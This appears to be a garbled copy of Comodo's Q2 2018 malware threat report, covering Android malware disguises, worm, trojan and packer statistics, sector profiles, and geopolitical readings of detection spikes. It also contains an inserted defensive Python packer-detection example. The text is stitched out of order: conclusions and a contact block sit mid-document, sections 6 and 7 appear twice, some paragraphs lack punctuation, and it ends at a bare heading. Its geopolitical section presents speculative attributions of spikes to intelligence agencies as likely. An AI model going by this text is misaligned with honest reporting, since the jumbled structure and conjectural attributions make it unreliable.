Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA. This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China. This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.


8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples

Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating bias toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.

NORTH AMERICA
Comodo Security Solutions, Inc.
1255 Broad Street, Clifton, NJ 07013, United States
Tel: +1 (888) 551 1531
Tel: +1 (888) 266 6361
Int: +1 (703) 581 6361
Fax: +1 (973) 777 4394
sales@comodo.com

EUROPE
Comodo Security Solutions, Inc.
Șoseaua Națională 31, Iași 700237, Romania
Tel: +40 332 806 772

ASIA
Comodo Security Solutions Pvt. Ltd.
Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India
Tel: +91 44 4562 2800
www.comodo.co.in

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process of setting up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 All Rights Reserved. Comodo Security Solutions, Inc.

Visit comodo.com

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.




4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

depostbankfinanzassistent
plmbank
aibibankandroid

The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly operates on Iranian territory. It spreads via third-party app stores, social networks and messengers.

Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس, تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Notably, it is sold in three tiers: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it keeps running in the background and starts its spying activity: it steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone

Disguises of Sonvpay


Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you tap this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises listed above.

4.1.11 CoinHive

The last item in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining capability. It is disseminated via the counterfeit apps listed below, but one of its vectors is especially interesting.

Version 1: Netflix Hack, Instagram Hack
Version 2: TSF Launcher
Version 3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via… another cryptominer, named CoinMiner.

How is that possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is herself a victim: thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2. No one can feel totally secure. Even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April

4.2.2 May 2018

Android-targeted malware in May


4.2.3 June 2018

Android-targeted malware in June


5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms are nasty in that they can also travel between victim computers by other means, for example via computer exploits and autorun functionality.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which in 2012 led the FBI to arrest 10 people for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the number one country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.


5.2.4 Exploits

Computer exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the number one constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows not only that Germany had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the number one home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
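A defender-side triage check for the packer tells just described, as an added example that is not Comodo's code or tooling: it walks a PE section table with nothing but struct, then flags the stock UPX section names, a section that is empty on disk but large in memory (the decompression target), a high-entropy section (the compressed image) and an entry point inside that section (where the decompression stub lives), so a "modified UPX" that merely renames its sections still trips the layout and entropy tells. The three PE images are constructed inline (the "compressed" bytes are a pseudo-random stream, not real packer output), and the 7.0 bits/byte threshold and the two-tells rule are assumptions.

```python
import math
import struct

UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}  # stock UPX names; modified builds rename them
HIGH_ENTROPY = 7.0  # bits per byte (assumed threshold); compressed data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Struct-only PE walk: return (entry_point_rva, [(name, vaddr, vsize, raw), ...])."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # COFF file header
    num_sections, = struct.unpack_from("<H", pe, coff + 2)
    size_of_opt, = struct.unpack_from("<H", pe, coff + 16)
    opt = coff + 20                                       # optional header
    entry_rva, = struct.unpack_from("<I", pe, opt + 16)   # AddressOfEntryPoint
    sections = []
    for i in range(num_sections):
        off = opt + size_of_opt + 40 * i                  # 40-byte section headers
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        sections.append((name, vaddr, vsize, pe[raw_ptr:raw_ptr + raw_size]))
    return entry_rva, sections


def packer_indicators(pe: bytes) -> dict:
    """Evaluate the packer tells; True means the tell was observed."""
    entry_rva, sections = parse_sections(pe)

    def hot(raw: bytes) -> bool:  # enough bytes to measure, and compressed-looking
        return len(raw) >= 64 and shannon_entropy(raw) >= HIGH_ENTROPY

    entry_hot = any(hot(raw) for _, vaddr, vsize, raw in sections
                    if vaddr <= entry_rva < vaddr + max(vsize, len(raw)))
    return {
        "upx_section_names": any(n in UPX_SECTION_NAMES for n, *_ in sections),
        "section_empty_on_disk": any(not raw and vsize >= 0x1000 for _, _, vsize, raw in sections),
        "high_entropy_section": any(hot(raw) for *_, raw in sections),
        "entry_point_in_high_entropy_section": entry_hot,
    }


def looks_packed(pe: bytes) -> bool:
    """Two or more independent tells: treat as packed and route to unpacking or a sandbox."""
    return sum(packer_indicators(pe).values()) >= 2


def build_pe(sections, entry_rva: int) -> bytes:
    """Minimal PE32 image for testing (constructed, not a real binary).
    sections = [(name, vaddr, vsize, raw)]; optional header is zero except the fields read above."""
    e_lfanew, size_of_opt = 0x40, 224                   # 224 = PE32 optional header size
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_of_opt, 0x102)
    opt = bytearray(size_of_opt)
    struct.pack_into("<H", opt, 0, 0x10B)               # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)          # AddressOfEntryPoint
    raw_ptr = e_lfanew + 4 + len(coff) + size_of_opt + 40 * len(sections)
    table, body = b"", b""
    for name, vaddr, vsize, raw in sections:
        table += name.encode().ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", vsize, vaddr, len(raw), raw_ptr if raw else 0, 0, 0, 0, 0, 0x60000020)
        body += raw
        raw_ptr += len(raw)
    return dos + b"PE\0\0" + coff + bytes(opt) + table + body


def _noise(n: int, seed: int = 7) -> bytes:
    """Deterministic pseudo-random bytes standing in for compressed data (LCG)."""
    out, x = bytearray(), seed
    for _ in range(n):
        x = (1103515245 * x + 12345) & 0x7FFFFFFF
        out.append((x >> 16) & 0xFF)
    return bytes(out)


# Constructed samples: a stock-UPX layout, the same layout behind innocuous section
# names (what a renaming "modified UPX" leaves behind), and an unpacked layout.
UPX_SAMPLE = build_pe([("UPX0", 0x1000, 0x8000, b""), ("UPX1", 0x9000, 0x2000, _noise(4096)),
                       (".rsrc", 0xB000, 0x200, b"\0" * 512)], entry_rva=0x9F00)
RENAMED_SAMPLE = build_pe([(".text", 0x1000, 0x8000, b""), (".data", 0x9000, 0x2000, _noise(4096, 99)),
                           (".rsrc", 0xB000, 0x200, b"\0" * 512)], entry_rva=0x9F00)
PLAIN_SAMPLE = build_pe([(".text", 0x1000, 0x1000, b"\x90" * 2048 + b"\xC3" + b"\0" * 2047),
                         (".data", 0x2000, 0x200, b"hello world\0" * 40)], entry_rva=0x1000)

if __name__ == "__main__":
    for label, pe in (("stock UPX", UPX_SAMPLE), ("renamed", RENAMED_SAMPLE), ("unpacked", PLAIN_SAMPLE)):
        print(f"{label:10s} packed={looks_packed(pe)} {packer_indicators(pe)}")
```

Name matching alone misses the renamed sample; the layout and entropy tells are what carry a modified packer into the "packed" verdict.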


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous – but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. These include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are number two and three respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section, let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the number one malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not in just one but in multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.

In conclusion, first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill those requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes coincided with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that some person or institution was briefly more connected to the Internet than usual, or was trying to take advantage of a short period of political openness to better connect with the outside world. Further research on the detected files identified them as Windows activation ("cracking") software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware, because almost all activity, from social life to business, politics and national security affairs, is now conducted online. This is especially true in times of national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest malware detection count in that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free." Evidence for this argument is provided by this timeline of Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news," Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used specifically to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both may be associated with electoral events. In mid-April, Iraq was preparing for a national election, which included the conundrum of how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

